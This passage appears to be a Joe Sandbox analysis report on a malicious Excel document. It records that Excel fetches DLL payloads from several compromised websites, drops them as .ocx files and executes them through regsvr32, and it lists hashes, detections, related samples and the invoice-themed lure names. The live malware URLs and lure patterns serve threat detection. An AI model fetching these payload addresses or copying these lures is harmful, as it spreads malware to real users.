                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:10:28API Interceptor3713x Sleep call for process: regsvr32.exe modified
                              09:10:30API Interceptor443x Sleep call for process: svchost.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              85.114.142.153documento_2005.xlsGet hashmaliciousBrowse
                              • kolejleri.com/wp-admin/REvup/
                              Lkd_2005.xlsGet hashmaliciousBrowse
                              • kolejleri.com/wp-admin/REvup/
                              SCAN_89357809.xlsGet hashmaliciousBrowse
                              • kolejleri.com/wp-admin/REvup/
                              103.171.181.223documento_2005.xlsGet hashmaliciousBrowse
                              • learnviaonline.com/wp-admin/qGb/
                              Lkd_2005.xlsGet hashmaliciousBrowse
                              • learnviaonline.com/wp-admin/qGb/
                              SCAN_89357809.xlsGet hashmaliciousBrowse
                              • learnviaonline.com/wp-admin/qGb/
                              QON7521489768 invoice.zip_br_ Password_ 747jm87hy_br_.lnkGet hashmaliciousBrowse
                              • learnviaonline.com/wp-admin/f1tisSTS/
                              ACH Payment Advice.zip_br_ Password_ 4434OTTNU_br_.lnkGet hashmaliciousBrowse
                              • learnviaonline.com/wp-admin/f1tisSTS/
                              Invoice # 96995631 X#9932993 05829.zip_br_ Password_ vh98bsv4_br_.lnkGet hashmaliciousBrowse
                              • learnviaonline.com/wp-admin/f1tisSTS/
                              QON7521489768 invoice.zip_br_ Password_ 747jm87hy_br_.lnkGet hashmaliciousBrowse
                              • learnviaonline.com/wp-admin/f1tisSTS/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              milanstaffing.comdocumento_2005.xlsGet hashmaliciousBrowse
                              • 107.189.3.39
                              Lkd_2005.xlsGet hashmaliciousBrowse
                              • 107.189.3.39
                              SCAN_89357809.xlsGet hashmaliciousBrowse
                              • 107.189.3.39
                              stainedglassexpress.comdocumento_2005.xlsGet hashmaliciousBrowse
                              • 66.71.247.68
                              Lkd_2005.xlsGet hashmaliciousBrowse
                              • 66.71.247.68
                              SCAN_89357809.xlsGet hashmaliciousBrowse
                              • 66.71.247.68
                              kolejleri.comdocumento_2005.xlsGet hashmaliciousBrowse
                              • 85.114.142.153
                              Lkd_2005.xlsGet hashmaliciousBrowse
                              • 85.114.142.153
                              SCAN_89357809.xlsGet hashmaliciousBrowse
                              • 85.114.142.153
                              learnviaonline.comdocumento_2005.xlsGet hashmaliciousBrowse
                              • 103.171.181.223
                              Lkd_2005.xlsGet hashmaliciousBrowse
                              • 103.171.181.223
                              SCAN_89357809.xlsGet hashmaliciousBrowse
                              • 103.171.181.223
                              QON7521489768 invoice.zip_br_ Password_ 747jm87hy_br_.lnkGet hashmaliciousBrowse
                              • 103.171.181.223
                              ACH Payment Advice.zip_br_ Password_ 4434OTTNU_br_.lnkGet hashmaliciousBrowse
                              • 103.171.181.223
                              Invoice # 96995631 X#9932993 05829.zip_br_ Password_ vh98bsv4_br_.lnkGet hashmaliciousBrowse
                              • 103.171.181.223
                              QON7521489768 invoice.zip_br_ Password_ 747jm87hy_br_.lnkGet hashmaliciousBrowse
                              • 103.171.181.223

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              MYLOC-ASIPBackboneofmyLocmanagedITAGDEdocumento_2005.xlsGet hashmaliciousBrowse
                              • 85.114.142.153
                              Lkd_2005.xlsGet hashmaliciousBrowse
                              • 85.114.142.153
                              SCAN_89357809.xlsGet hashmaliciousBrowse
                              • 85.114.142.153
                              http://thesportsgrail.comGet hashmaliciousBrowse
                              • 85.114.159.93
                              Advice FTT5378393.exeGet hashmaliciousBrowse
                              • 93.186.201.208
                              z4ehq74vWOGet hashmaliciousBrowse
                              • 85.114.198.102
                              ST10501909262401.exeGet hashmaliciousBrowse
                              • 93.186.201.208
                              https://bullant-security.w3spaces.com/Get hashmaliciousBrowse
                              • 85.114.159.118
                              whvMLs1u4xGet hashmaliciousBrowse
                              • 89.163.194.115
                              Cancellation-507660980$-May5.xlsbGet hashmaliciousBrowse
                              • 5.199.136.61
                              Cancellation-507660980$-May5.xlsbGet hashmaliciousBrowse
                              • 5.199.136.61
                              https://sidebar.io/out?url=https%3A%2F%2Fwww.creativebloq.com%2Fnews%2Fworst-logos-2022%3Fref%3DsidebarGet hashmaliciousBrowse
                              • 85.114.159.118
                              https://ma-ilpanel.gamemodx.cf/auth.php?add=keith@steinborn.comGet hashmaliciousBrowse
                              • 85.114.159.93
                              oo9A7GRneRGet hashmaliciousBrowse
                              • 83.136.82.32
                              http://quick-adviser.com/how-do-i-stop-negative-values-in-java/Get hashmaliciousBrowse
                              • 80.82.217.90
                              https://rainbownnutbolt47-65.w3spaces.com/RAINBOW_NUT_AND_BOLT_april_13_2022.pdf?bypass-cache=68928506Get hashmaliciousBrowse
                              • 85.114.159.93
                              805YbfoCnN.xlsGet hashmaliciousBrowse
                              • 89.163.146.219
                              rRoIuoRpEQGet hashmaliciousBrowse
                              • 46.228.205.63
                              https://topcookingstories.com/library/lecture/read/40097-what-legendary-pets-can-you-get-out-of-a-cracked-egg#0Get hashmaliciousBrowse
                              • 85.114.159.93
                              http://69.35.136.34.bc.googleusercontent.com/jp/Get hashmaliciousBrowse
                              • 85.114.159.93
                              AARNET-AS-APAustralianAcademicandResearchNetworkAARNejew.arm7Get hashmaliciousBrowse
                              • 103.162.253.58
                              x86Get hashmaliciousBrowse
                              • 139.230.225.83
                              B2CP7AnrdzGet hashmaliciousBrowse
                              • 144.205.100.51
                              EhCzyqLrUkGet hashmaliciousBrowse
                              • 103.189.218.58
                              meerkat.arm7-20220522-2050Get hashmaliciousBrowse
                              • 139.230.83.233
                              KSA_67537835353.xlsxGet hashmaliciousBrowse
                              • 103.167.92.57
                              hiZKhinsQyGet hashmaliciousBrowse
                              • 103.161.25.109
                              Cff7khwHQFGet hashmaliciousBrowse
                              • 103.165.24.252
                              x8lFIk8wYKGet hashmaliciousBrowse
                              • 103.180.7.199
                              Un93F0RX3zGet hashmaliciousBrowse
                              • 103.64.107.175
                              F4Bl65ZbQfGet hashmaliciousBrowse
                              • 103.182.254.153
                              o9flt31DtmGet hashmaliciousBrowse
                              • 139.230.225.98
                              sora.armGet hashmaliciousBrowse
                              • 103.179.236.167
                              DQR5IGyfauGet hashmaliciousBrowse
                              • 103.33.61.96
                              phantom.armGet hashmaliciousBrowse
                              • 103.171.158.160
                              wiDR0DkFXyGet hashmaliciousBrowse
                              • 138.7.88.121
                              2205117369.xlsxGet hashmaliciousBrowse
                              • 103.176.113.85
                              Ponuda garik doo.xlsxGet hashmaliciousBrowse
                              • 103.167.92.57
                              winlogon.exeGet hashmaliciousBrowse
                              • 103.176.113.85
                              TMXAt4vwD5Get hashmaliciousBrowse
                              • 103.167.104.17

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                              Download File
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                              Category:dropped
                              Size (bytes):61480
                              Entropy (8bit):7.9951219482618905
                              Encrypted:true
                              SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                              MD5:B9F21D8DB36E88831E5352BB82C438B3
                              SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                              SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                              SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                              Malicious:false
                              Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                              Download File
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):2.9363699995422854
                              Encrypted:false
                              SSDEEP:6:kKnqoxN+SkQlPlEGYRMY9z+4KlDA3RUe/:vMkPlE99SNxAhUe/
                              MD5:66266C092C98169F6E97AC380BCF0A21
                              SHA1:473D9941B67B30B2123048912EEAA3F52EA1972B
                              SHA-256:52749029E461E7B4BD7A5D89ACF303535E71BE7A0ECA9553DF751A0F11647B51
                              SHA-512:B05210D71704F0B37074B58D2F4ED04B03A067D49F830117F2F5745FE136C89B40E7EAB61B471A103B399C539D73D18EC1506DF38731D260ABFE6A170A44D485
                              Malicious:false
                              Preview:p...... ........9{Oa.n..(....................................................... ........3k/"[..................(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:downloaded
                              Size (bytes):371200
                              Entropy (8bit):7.1527203772082135
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7YxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Qy/BJ7rGTK/V3
                              MD5:828A9B1007DC45671D8A58E240C7C973
                              SHA1:8214993BB314D0F4C1889E507F88BEEB3F6E5B63
                              SHA-256:B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                              SHA-512:7519B39DD811C3578E0002D5C4F35B2A6855092978004ECB2CA0030C1550AA3D38B346F83C43EB286AB9E1BF6209050078286DDB8BFEA5F1D5DC3EFCAAFEEEEF
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              IE Cache URL:http://stainedglassexpress.com/classes/05SkiiW9y4DDGvb6/
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:downloaded
                              Size (bytes):371200
                              Entropy (8bit):7.152718217466625
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7LxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7xy/BJ7rGTK/V3
                              MD5:646CA94D40F268C87215FFEA9FD0E826
                              SHA1:22E67EB4D6E4B5F09E3DE5A6021462ADCF99FE75
                              SHA-256:52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                              SHA-512:5AE522EB99551146F84F9AA94F270083CEDC1BB8DF26697E15D57FCF7AF126766F8F18ED4FFAC06DF46D88E07C08A8523CD8A4187AF3DD8173BAF35272DE794B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Metadefender, Detection: 29%, Browse
                              • Antivirus: ReversingLabs, Detection: 61%
                              IE Cache URL:http://milanstaffing.com/images/D4TRnDubF/
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:downloaded
                              Size (bytes):371200
                              Entropy (8bit):7.152704988682108
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7DxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Zy/BJ7rGTK/V3
                              MD5:5A9E3E501F04B27A38BCA881A68A1785
                              SHA1:9573AB24845B8FA1408F0381E64A40A5CC2A879E
                              SHA-256:306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                              SHA-512:FB6BABA1B27D7019DA35D2CF854A111DEE6574196CC9E2022956ABDB3717B5C2321DC8811533205B3AA87A047AC6D927252688AAFAA802AFB989E38568C1EC58
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              IE Cache URL:http://kolejleri.com/wp-admin/REvup/
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:downloaded
                              Size (bytes):371200
                              Entropy (8bit):7.1527177644825635
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7fxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7ly/BJ7rGTK/V3
                              MD5:C9FD6F4A594719F21F310D8D0A2E55BB
                              SHA1:D999195E150304EF6FA4AE5362FDB70D0457429B
                              SHA-256:E654F14F3A98027669FD428597A2B4967B5276BDB94DA7770189E791FD98FC50
                              SHA-512:BC7F62214F70076027355858367004A019FBE18EE9404AC58ECC550C9EF5F2B3DB6A01E2B60A33E55B5FE323D52CD1BA0C455AA2C99E058140F9ABD5AF5B8E8E
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              IE Cache URL:http://learnviaonline.com/wp-admin/qGb/
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\CabEE4E.tmp

                              Download File
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                              Category:dropped
                              Size (bytes):61480
                              Entropy (8bit):7.9951219482618905
                              Encrypted:true
                              SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                              MD5:B9F21D8DB36E88831E5352BB82C438B3
                              SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                              SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                              SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                              Malicious:false
                              Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                              C:\Users\user\AppData\Local\Temp\TarEE4F.tmp

                              Download File
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:data
                              Category:modified
                              Size (bytes):162196
                              Entropy (8bit):6.301436092020807
                              Encrypted:false
                              SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                              MD5:E721613517543768F0DE47A6EEEE3475
                              SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                              SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                              SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                              Malicious:false
                              Preview:0..y...*.H.........y.0..yz...1.0...`.H.e......0..i...+.....7.....i.0..i.0...+.....7........SiU[v...220418211447Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                              C:\Users\user\AppData\Local\Temp\~DFFD13BCD3EE2F686F.TMP

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):28672
                              Entropy (8bit):3.440608621024532
                              Encrypted:false
                              SSDEEP:768:cDRKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+V0qs9s1X8:cVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UU
                              MD5:A406AA1773C3292E4769B91791FEA502
                              SHA1:42B4155CFEAC777DD81ED4D6847BD29DF7D63810
                              SHA-256:1035D746F889351ED4258FBFC62EEDD75409A3CF4DEC52D81CE1C162CB5210DC
                              SHA-512:CCFC0521C6B9D6C67911139131AF133D7C7047CE3485526E7898B598ABB370587EA7DB8D006BE52274E92A744C5D812110FB4AD141D07C2B5966820AE3B83AA4
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\Desktop\DETAILS 25922194612.xls

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 07:48:11 2022, Security: 0
                              Category:dropped
                              Size (bytes):69120
                              Entropy (8bit):6.427901607097409
                              Encrypted:false
                              SSDEEP:1536:aVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+y9s1a6YG2jzQ0viPvDNHh9e6:4Kpb8rGYrMPe3q7Q0XV5xtezE8vG8UMs
                              MD5:0E2564F95F78ADB6AFF73888666FE471
                              SHA1:260A67566C40773895E2A062A205C3E67F6B388A
                              SHA-256:71F0E26B98B6FD162568CFAE666EAF0D043E7DD8BD9E2B7119D7C5944FF8B836
                              SHA-512:ACED75250CA50F8C81DD76D3FDCFA3F9471E0F6039BBF2B7920D201DFBA9E67834708CB9F7637A7B6D56898952FA6149EE353CC8BA99EF40312526F76507D0CB
                              Malicious:true
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....userTH B.....a.........=.................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......

                              C:\Users\user\uxevr1.ocx

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.1527177644825635
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7fxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7ly/BJ7rGTK/V3
                              MD5:C9FD6F4A594719F21F310D8D0A2E55BB
                              SHA1:D999195E150304EF6FA4AE5362FDB70D0457429B
                              SHA-256:E654F14F3A98027669FD428597A2B4967B5276BDB94DA7770189E791FD98FC50
                              SHA-512:BC7F62214F70076027355858367004A019FBE18EE9404AC58ECC550C9EF5F2B3DB6A01E2B60A33E55B5FE323D52CD1BA0C455AA2C99E058140F9ABD5AF5B8E8E
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\uxevr2.ocx

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.152704988682108
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7DxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Zy/BJ7rGTK/V3
                              MD5:5A9E3E501F04B27A38BCA881A68A1785
                              SHA1:9573AB24845B8FA1408F0381E64A40A5CC2A879E
                              SHA-256:306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                              SHA-512:FB6BABA1B27D7019DA35D2CF854A111DEE6574196CC9E2022956ABDB3717B5C2321DC8811533205B3AA87A047AC6D927252688AAFAA802AFB989E38568C1EC58
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\uxevr3.ocx

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.1527203772082135
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7YxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Qy/BJ7rGTK/V3
                              MD5:828A9B1007DC45671D8A58E240C7C973
                              SHA1:8214993BB314D0F4C1889E507F88BEEB3F6E5B63
                              SHA-256:B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                              SHA-512:7519B39DD811C3578E0002D5C4F35B2A6855092978004ECB2CA0030C1550AA3D38B346F83C43EB286AB9E1BF6209050078286DDB8BFEA5F1D5DC3EFCAAFEEEEF
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\uxevr4.ocx

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.152718217466625
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7LxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7xy/BJ7rGTK/V3
                              MD5:646CA94D40F268C87215FFEA9FD0E826
                              SHA1:22E67EB4D6E4B5F09E3DE5A6021462ADCF99FE75
                              SHA-256:52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                              SHA-512:5AE522EB99551146F84F9AA94F270083CEDC1BB8DF26697E15D57FCF7AF126766F8F18ED4FFAC06DF46D88E07C08A8523CD8A4187AF3DD8173BAF35272DE794B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Metadefender, Detection: 29%, Browse
                              • Antivirus: ReversingLabs, Detection: 61%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy)

                              Download File
                              Process:C:\Windows\System32\regsvr32.exe
